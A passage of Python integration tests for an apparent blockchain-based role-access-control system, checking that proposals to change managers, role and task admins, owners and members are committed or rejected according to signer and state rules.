reason=uuid4().hex,
user_id=self.key2a.public_key,
manager_id=self.key2b.public_key)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_update_manager(
key=self.key2b,
proposal_id=self.update_manager_proposal_id,
reason=uuid4().hex,
user_id=self.key2a.public_key,
manager_id=self.key2b.public_key)[0]['status'],
"INVALID",
"The proposal must be open")
def test_04_reject_update_manager_proposal(self):
"""Tests the RejectUpdateUserManager validation rules.
Notes:
RejectUpdateUserManager validation rules
- The proposal is open and exists.
- The manager's id is the header signer pubkey.
"""
proposal_id = uuid4().hex
self.assertEqual(
self.client.propose_update_manager(
key=self.key2b,
proposal_id=proposal_id,
reason=uuid4().hex,
user_id=self.key2a.public_key,
new_manager_id=self.key3b.public_key,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_update_manager(
key=self.key1,
proposal_id=uuid4().hex,
reason=uuid4().hex,
user_id=self.key1.public_key,
manager_id=self.key3b.public_key)[0]['status'],
"INVALID",
"The proposal does not exist")
self.assertEqual(
self.client.reject_update_manager(
key=self.key3b,
proposal_id=proposal_id,
reason=uuid4().hex,
user_id=self.key2a.public_key,
manager_id=self.key3b.public_key)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_update_manager(
key=self.key3b,
proposal_id=proposal_id,
reason=uuid4().hex,
user_id=self.key2a.public_key,
manager_id=self.key3b.public_key)[0]['status'],
"INVALID",
"The proposal is not open")
def test_05_propose_add_role_admins(self):
"""Tests the ProposeAddRoleAdmins validation rules.
Notes:
ProposeAddRoleAdmins validation rules
- No proposal exists for the same change.
- The user is not already an admin.
- The txn is signed by either the User or their manager.
- The User exists.
- The Role exists.
At this point:
        user1            role1
           \                \
          user2b           admins
          /    \             - user1
         /    user2a         - user2a
     user3b      \
              user3a
"""
invalid_role_id = uuid4().hex
invalid_user_id = uuid4().hex
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key1,
proposal_id=uuid4().hex,
role_id=invalid_role_id,
user_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The role must exist")
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key1,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=invalid_user_id,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The user must exist")
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key1,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn must be signed by either the user or their manager")
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key2a,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key2a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The user must not already be an admin")
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key2a,
proposal_id=self.add_role_admins_proposal_id,
role_id=self.role_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key2a,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"There must not be an open proposal for the same change.")
def test_06_confirm_add_role_admins(self):
"""Tests the ConfirmAddRoleAdmins validation rules.
Notes:
ConfirmAddRoleAdmins validation rules
- The txn signer is a Role Admin for the role.
- The proposal exists and is open.
"""
self.assertEqual(
self.client.confirm_add_role_admins(
key=self.key3b,
proposal_id=self.add_role_admins_proposal_id,
role_id=self.role_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer for ConfirmAddRoleAdmin must be an admin "
"of the role.")
self.assertEqual(
self.client.confirm_add_role_admins(
key=self.key1,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=uuid4().hex,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.confirm_add_role_admins(
key=self.key1,
proposal_id=self.add_role_admins_proposal_id,
role_id=self.role_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_add_role_admins(
key=self.key1,
proposal_id=self.add_role_admins_proposal_id,
role_id=self.role_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_07_reject_add_role_admins(self):
"""Tests the RejectAddRoleAdmins validation rules.
Notes:
RejectAddRoleAdmins validation rules
- The txn signer is a role admin.
- The proposal exists and is open.
"""
proposal_id = uuid4().hex
self.assertEqual(
self.client.propose_add_role_admins(
key=self.key2b,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_admins(
key=self.key3b,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The user is not a Role Admin.")
self.assertEqual(
self.client.reject_add_role_admins(
key=self.key1,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=uuid4().hex,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.reject_add_role_admins(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_admins(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_08_propose_add_role_owners(self):
"""Tests the ProposeAddRoleOwners validation rules.
Notes:
ProposeAddRoleOwners validation rules
- The Role exists.
- The User exists.
- The txn signer is either the User or the User's manager.
- No open proposal exists for the same change.
- The User is not already an Owner of the Role.
"""
self.assertEqual(
self.client.propose_add_role_owners(
key=self.key2b,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The role must exist.")
self.assertEqual(
self.client.propose_add_role_owners(
key=self.key2b,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=uuid4().hex,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The user must exist")
self.assertEqual(
self.client.propose_add_role_owners(
key=self.key1,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be the user or user's manager.")
self.assertEqual(
self.client.propose_add_role_owners(
key=self.key2b,
proposal_id=self.add_role_owners_proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_role_owners(
key=self.key2b,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"No open proposal can exist for the same state change.")
def test_09_confirm_add_role_owners(self):
"""Tests the ConfirmAddRoleOwners validation rules.
Notes:
ConfirmAddRoleOwners validation rules
- The proposal exists and is open.
- The txn signer is a Role admin.
At this point:
        user1            role1
           \                \
          user2b           admins
          /    \             - user1
         /    user2a         - user2a
     user3b      \           - user3a
              user3a
"""
self.assertEqual(
self.client.confirm_add_role_owners(
key=self.key2b,
proposal_id=self.add_role_admins_proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer for ConfirmAddRoleOwner must be an admin "
"of the role.")
self.assertEqual(
self.client.confirm_add_role_owners(
key=self.key1,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=uuid4().hex,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.confirm_add_role_owners(
key=self.key3a,
proposal_id=self.add_role_owners_proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_add_role_owners(
key=self.key3a,
proposal_id=self.add_role_admins_proposal_id,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_10_reject_add_role_owners(self):
"""Tests the RejectAddRoleOwners validation rules.
Notes:
RejectAddRoleOwners validation rules
- The txn signer is an admin of the Role
- The proposal exists and is open.
"""
proposal_id = uuid4().hex
self.assertEqual(
self.client.propose_add_role_owners(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_owners(
key=self.key3b,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer is not a Role Admin.")
self.assertEqual(
self.client.reject_add_role_owners(
key=self.key1,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=uuid4().hex,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.reject_add_role_owners(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_owners(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_11_propose_add_role_members(self):
"""Tests the ProposeAddRoleMembers validation rules.
Notes:
ProposeAddRoleMembers validation rules
- The Role exists.
- The User exists.
- The txn signer is either the User or the User's manager.
- No open proposal exists for the same change.
- The User is not already a Member of the Role.
At this point:
        user1              role1
           \              /     \
          user2b      owners    admins
          /    \        - user3b  - user1
         /    user2a              - user2a
     user3b      \                - user3a
              user3a
"""
self.assertEqual(
self.client.propose_add_role_members(
key=self.key2b,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The role must exist.")
self.assertEqual(
self.client.propose_add_role_members(
key=self.key2b,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=uuid4().hex,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The user must exist")
self.assertEqual(
self.client.propose_add_role_members(
key=self.key1,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be the user or user's manager.")
self.assertEqual(
self.client.propose_add_role_members(
key=self.key1,
proposal_id=self.add_role_members_proposal_id,
role_id=self.role_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_role_members(
key=self.key1,
proposal_id=uuid4().hex,
role_id=self.role_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"No open proposal can exist for the same state change.")
def test_12_confirm_add_role_members(self):
"""Tests the ConfirmAddRoleMembers validation rules.
Notes:
ConfirmAddRoleMembers validation rules
- The proposal exists and is open.
- The txn signer is a Role owner.
"""
self.assertEqual(
self.client.confirm_add_role_members(
key=self.key1,
proposal_id=self.add_role_members_proposal_id,
role_id=self.role_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer for ConfirmAddRoleMember must be an owner "
"of the role.")
self.assertEqual(
self.client.confirm_add_role_members(
key=self.key3b,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=uuid4().hex,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.confirm_add_role_members(
key=self.key3b,
proposal_id=self.add_role_members_proposal_id,
role_id=self.role_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_add_role_members(
key=self.key3b,
proposal_id=self.add_role_members_proposal_id,
role_id=self.role_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_13_reject_add_role_members(self):
"""Tests the RejectAddRoleMembers validation rules.
Notes:
RejectAddRoleMembers validation rules
- The txn signer is an owner of the Role
- The proposal exists and is open.
"""
proposal_id = uuid4().hex
self.assertEqual(
self.client.propose_add_role_members(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_members(
key=self.key2a,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer is not a Role Owner.")
self.assertEqual(
self.client.reject_add_role_members(
key=self.key3b,
proposal_id=uuid4().hex,
role_id=uuid4().hex,
user_id=uuid4().hex,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.reject_add_role_members(
key=self.key3b,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_members(
key=self.key3b,
proposal_id=proposal_id,
role_id=self.role_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_14_create_task(self):
"""Tests the CreateTask validation rules.
Notes:
CreateTask validation rules
- The admins listed are users.
- The task_id is not used already.
"""
self.assertEqual(
self.client.create_task(
key=self.key1,
task_id=uuid4().hex,
task_name=uuid4().hex,
admins=[uuid4().hex],
owners=[self.key1.public_key],
metadata=uuid4().hex)[0]['status'],
"INVALID",
"All admins must be users.")
self.assertEqual(
self.client.create_task(
key=self.key1,
task_id=uuid4().hex,
task_name=uuid4().hex,
admins=[self.key1.public_key],
owners=[uuid4().hex],
metadata=uuid4().hex)[0]['status'],
"INVALID",
"All owners must be users")
self.assertEqual(
self.client.create_task(
key=self.key1,
task_id=self.task_id1,
task_name=uuid4().hex,
admins=[self.key1.public_key],
owners=[self.key2a.public_key],
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.create_task(
key=self.key1,
task_id=self.task_id1,
task_name=uuid4().hex,
admins=[self.key1.public_key],
owners=[self.key1.public_key],
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The task_id must not belong to another task.")
def test_15_propose_add_role_tasks(self):
"""Tests the ProposeAddRoleTasks validation rules.
Notes:
ProposeAddRoleTask validation rules
- The txn is signed by a role owner.
- The Role exists.
- The Task exists.
- The Task isn't already part of the Role.
- No open proposal exists for the same change.
"""
self.assertEqual(
self.client.propose_add_role_tasks(
key=self.key1,
proposal_id=str(uuid4()),
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be a Role Owner")
self.assertEqual(
self.client.propose_add_role_tasks(
key=self.key3b,
proposal_id=str(uuid4()),
role_id=str(uuid4()),
task_id=self.task_id1,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The role must exist.")
self.assertEqual(
self.client.propose_add_role_tasks(
key=self.key3b,
proposal_id=str(uuid4()),
role_id=str(uuid4()),
task_id=self.task_id1,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The task must exist.")
self.assertEqual(
self.client.propose_add_role_tasks(
key=self.key3b,
proposal_id=self.add_role_tasks_proposal_id,
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_role_tasks(
key=self.key3b,
proposal_id=str(uuid4()),
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"No Proposal for the same Add Role Task can exist.")
def test_16_confirm_add_role_tasks(self):
"""Tests the ConfirmAddRoleTasks validation rules.
Notes:
ConfirmAddRoleTasks validation rules
- The Proposal exists and is open.
- The txn signer is an Owner of the Task
"""
self.assertEqual(
self.client.confirm_add_role_tasks(
key=self.key2a,
proposal_id=str(uuid4()),
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.confirm_add_role_tasks(
key=self.key1,
proposal_id=self.add_role_tasks_proposal_id,
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be a Task Owner.")
self.assertEqual(
self.client.confirm_add_role_tasks(
key=self.key2a,
proposal_id=self.add_role_tasks_proposal_id,
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_add_role_tasks(
key=self.key2a,
proposal_id=self.add_role_tasks_proposal_id,
role_id=self.role_id1,
task_id=self.task_id1,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_17_reject_add_role_tasks(self):
"""Tests the RejectAddRoleTasks validation rules.
Notes:
RejectAddRoleTasks validation rules
- The Proposal exists and is open.
- The txn signer is an Owner of the Task
"""
proposal_id = str(uuid4())
task_id = str(uuid4())
self.assertEqual(
self.client.create_task(
self.key1,
task_id=task_id,
task_name=uuid4().hex,
admins=[self.key1.public_key],
owners=[self.key1.public_key],
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_role_tasks(
key=self.key3b,
proposal_id=proposal_id,
role_id=self.role_id1,
task_id=task_id,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_tasks(
key=self.key1,
proposal_id=str(uuid4()),
role_id=self.role_id1,
task_id=task_id,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.reject_add_role_tasks(
key=self.key2a,
proposal_id=proposal_id,
role_id=self.role_id1,
task_id=task_id,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be a Task Owner.")
self.assertEqual(
self.client.reject_add_role_tasks(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
task_id=task_id,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_role_tasks(
key=self.key1,
proposal_id=proposal_id,
role_id=self.role_id1,
task_id=task_id,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_18_propose_add_task_admins(self):
"""Tests the ProposeAddTaskAdmins validation rules.
Notes:
ProposeAddTaskAdmins validation rules.
- The Task exists
- The User exists
- The txn signer is the User or the User's manager.
- No open proposal exists for the same change.
- The user is not already an Admin of the Task.
"""
self.assertEqual(
self.client.propose_add_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=str(uuid4()),
user_id=self.key2b.public_key,
reason=str(uuid4()),
metadata=str(uuid4()))[0]['status'],
"INVALID",
"The Task must exist.")
self.assertEqual(
self.client.propose_add_task_admins(
key=self.key_invalid,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key_invalid.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The user must exist")
self.assertEqual(
self.client.propose_add_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key3a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be the user or user's manager")
self.assertEqual(
self.client.propose_add_task_admins(
key=self.key2b,
proposal_id=self.add_task_admins_proposal_id,
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_task_admins(
key=self.key2b,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The must not be any open proposal for the same change.")
def test_19_confirm_add_task_admins(self):
"""Tests the ConfirmAddTaskAdmins validation rules
Notes
ConfirmAddTaskAdmins validation rules
- The proposal exists and is open.
- The txn signer is a Task Admin.
"""
self.assertEqual(
self.client.confirm_add_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.confirm_add_task_admins(
key=self.key1,
proposal_id=self.add_task_admins_proposal_id,
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_add_task_admins(
key=self.key1,
proposal_id=self.add_task_admins_proposal_id,
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_20_reject_add_task_admins(self):
"""Tests the RejectAddTaskAdmins validation rules
Notes
RejectAddTaskAdmins validation rules
- The proposal exists and is open.
- The txn signer is a Task Admin.
"""
proposal_id = str(uuid4())
self.assertEqual(
self.client.propose_add_task_admins(
key=self.key2b,
proposal_id=proposal_id,
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.reject_add_task_admins(
key=self.key1,
proposal_id=proposal_id,
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_task_admins(
key=self.key1,
proposal_id=proposal_id,
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_21_propose_add_task_owners(self):
"""Tests the ProposeAddTaskOwners validation rules
Notes:
ProposeAddTaskOwners
- The Task exists
- The User exists
- No open proposal exists for the same change.
- The txn signer is the user or the Users manager.
- The User is not already an Owner of the Task.
"""
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key1,
proposal_id=str(uuid4()),
task_id=str(uuid4()),
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The Task must exist.")
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key2a,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=str(uuid4()),
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must exist.")
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key2a,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must not already be an Owner of the Task")
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key3a,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be the User or the Users manager.")
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key1,
proposal_id=self.add_task_owners_proposal_id,
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key1,
proposal_id=self.add_task_owners_proposal_id,
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"There must not be an OPEN proposal for the same change.")
def test_22_confirm_add_task_owners(self):
"""Tests the ConfirmAddTaskOwners validation rules
Notes
ConfirmAddTaskOwners validation rules
- The proposal exists and is open.
- The txn signer is a Task Admin.
"""
self.assertEqual(
self.client.confirm_add_task_owners(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.confirm_add_task_owners(
key=self.key1,
proposal_id=self.add_task_owners_proposal_id,
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.confirm_add_task_owners(
key=self.key1,
proposal_id=self.add_task_owners_proposal_id,
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_23_reject_add_task_owners(self):
"""Tests the RejectAddTaskOwners validation rules
Notes:
RejectAddTaskOwners validation rules
- The proposal exists and is open
- The txn signer is a Task admin
"""
proposal_id = str(uuid4())
self.assertEqual(
self.client.propose_add_task_owners(
key=self.key2b,
proposal_id=proposal_id,
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_task_owners(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must exist.")
self.assertEqual(
self.client.reject_add_task_owners(
key=self.key1,
proposal_id=proposal_id,
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"COMMITTED")
self.assertEqual(
self.client.reject_add_task_owners(
key=self.key1,
proposal_id=proposal_id,
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex)[0]['status'],
"INVALID",
"The proposal must be open.")
def test_24_propose_remove_task_admins(self):
"""Tests the ProposeRemoveTaskAdmins txn validation rules.
Notes:
ProposeRemoveTaskAdmins validation rules
- No open proposal for the same change exists.
- The user is an admin of the task.
- The Task exists
- The User exists.
- The txn signer is the user or the user's manager.
"""
self.assertEqual(
self.client.propose_delete_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=str(uuid4()),
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The Task must exist.")
self.assertEqual(
self.client.propose_delete_task_admins(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=str(uuid4()),
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must exist.")
self.assertEqual(
self.client.propose_delete_task_admins(
key=self.key2a,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key2a.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must be an Admin of the Task.")
self.assertEqual(
self.client.propose_delete_task_admins(
key=self.key2b,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be the User or the User's Manager.")
self.assertEqual(
self.client.propose_delete_task_admins(
key=self.key1,
proposal_id=self.remove_task_admins_proposal_id,
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
def test_25_propose_remove_task_owners(self):
"""Tests the ProposeRemoveTaskOwners txn validation rules.
Notes:
ProposeRemoveTaskOwners validation rules
- No open proposal for the same change exists.
- The user is an Owner of the task.
- The Task exists.
- The User exists.
- The txn signer is the user or the user's manager.
"""
self.assertEqual(
self.client.propose_delete_task_owners(
key=self.key1,
proposal_id=str(uuid4()),
task_id=str(uuid4()),
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The Task must exist.")
self.assertEqual(
self.client.propose_delete_task_owners(
key=self.key1,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=str(uuid4()),
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must exist.")
self.assertEqual(
self.client.propose_delete_task_owners(
key=self.key3b,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key3b.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The User must be an Owner of the Task.")
self.assertEqual(
self.client.propose_delete_task_owners(
key=self.key2b,
proposal_id=str(uuid4()),
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"INVALID",
"The txn signer must be the User or the User's Manager.")
self.assertEqual(
self.client.propose_delete_task_owners(
key=self.key1,
proposal_id=self.remove_task_owners_proposal_id,
task_id=self.task_id1,
user_id=self.key1.public_key,
reason=uuid4().hex,
metadata=uuid4().hex)[0]['status'],
"COMMITTED")
class RBACClient(object):
def __init__(self, url):
self._client = RestClient(base_url=url)
def return_state(self):
items = []
for item in self._client.list_state(subtree=addresser.NS)['data']:
if addresser.address_is(item['address']) == addresser.AddressSpace.USER:
user_container = user_state_pb2.UserContainer()
user_container.ParseFromString(b64decode(item['data']))
items.append((user_container, addresser.AddressSpace.USER))
return items
def create_user(self, key, name, user_name, user_id, manager_id=None):
batch_list, signature = create_user(txn_key=key,
batch_key=BATCHER_KEY,
name=name,
